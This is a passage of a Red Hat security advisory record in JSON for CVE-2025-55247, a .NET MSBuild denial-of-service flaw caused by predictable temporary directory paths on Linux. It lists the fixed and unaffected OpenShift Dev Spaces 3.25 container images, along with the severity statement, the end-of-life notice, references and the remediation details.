"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2403086"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in MSBuild\u2019s temporary directory handling on Linux where predictable, non-randomized temporary paths are used. Local users can create or manipulate those paths before MSBuild runs, causing build failures or unexpected behavior and resulting in denial of service for build operations.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "dotnet: .NET Denial of Service Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The Red Hat Product Security team has assessed this issue as Moderate. Predictable MSBuild temporary directory paths on Linux allow a local user to precreate or manipulate build temp directories, causing build failures (denial of service) on shared build hosts or CI runners using the affected .NET packages.\n\n```\n\n.NET 6.0 for RHEL-8, RHEL-9 and RHIVOS has reached its End of Life as of November 12, 2024, and is no longer supported. No fixes will be provided for this stream. For additional information about lifecycle for .NET on Red Hat Enterprise Linux, please refer to: https://access.redhat.com/support/policy/updates/net-core.\n\n```",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-55247"
},
{
"category": "external",
"summary": "RHBZ#2403086",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2403086"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-55247",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55247"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-55247",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55247"
}
],
"release_date": "2025-10-15T13:06:53.521000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-15T21:46:21+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23225"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
